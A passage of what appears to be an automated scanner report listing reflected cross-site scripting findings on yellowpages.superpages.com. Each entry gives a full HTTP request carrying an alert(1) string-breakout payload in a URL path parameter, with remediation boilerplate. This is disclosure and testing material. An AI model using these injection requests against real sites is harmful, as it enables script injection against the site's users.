GET /common3fdca"-alert(1)-"96068b15aaf/css/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef7bf"-alert(1)-"eed6ae6e6f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a006a"-alert(1)-"cbff4859ae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/print.cssa006a"-alert(1)-"cbff4859ae5 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1ff"-alert(1)-"dc2efa902dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95a34"-alert(1)-"686e302e816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css95a34"-alert(1)-"686e302e816/reset.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aabb"-alert(1)-"23c3bf4d12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/reset.css3aabb"-alert(1)-"23c3bf4d12 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15d"-alert(1)-"4cb99c62a1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c75f4"-alert(1)-"02b021d68ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec1e7"-alert(1)-"03bc909001e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c20"-alert(1)-"e4243f6ac8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8cb3"-alert(1)-"ad160d53bf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fc04"-alert(1)-"230ea56f1b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97191"-alert(1)-"a26cfc23980 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3da"-alert(1)-"acb1d78ef25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa201"-alert(1)-"737b17cce6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53209"-alert(1)-"19f62aec85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common53209"-alert(1)-"19f62aec85/css/sppromoads.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c53f7"-alert(1)-"f0b92738dcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6905"-alert(1)-"628f1c95393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4770c"-alert(1)-"4414bf7cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4770c"-alert(1)-"4414bf7cc3/css/structure.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee76"-alert(1)-"0d4decbeb19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssdee76"-alert(1)-"0d4decbeb19/structure.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1738"-alert(1)-"099ed66255a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/structure.cssb1738"-alert(1)-"099ed66255a HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992a6"-alert(1)-"25f8f156e7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common992a6"-alert(1)-"25f8f156e7b/css/styles.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd028"-alert(1)-"da24c435281 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssdd028"-alert(1)-"da24c435281/styles.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e49"-alert(1)-"cece7288702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/styles.css67e49"-alert(1)-"cece7288702 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd884"-alert(1)-"66558d398fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondd884"-alert(1)-"66558d398fa/css/typography.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cec5"-alert(1)-"d776eed8f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
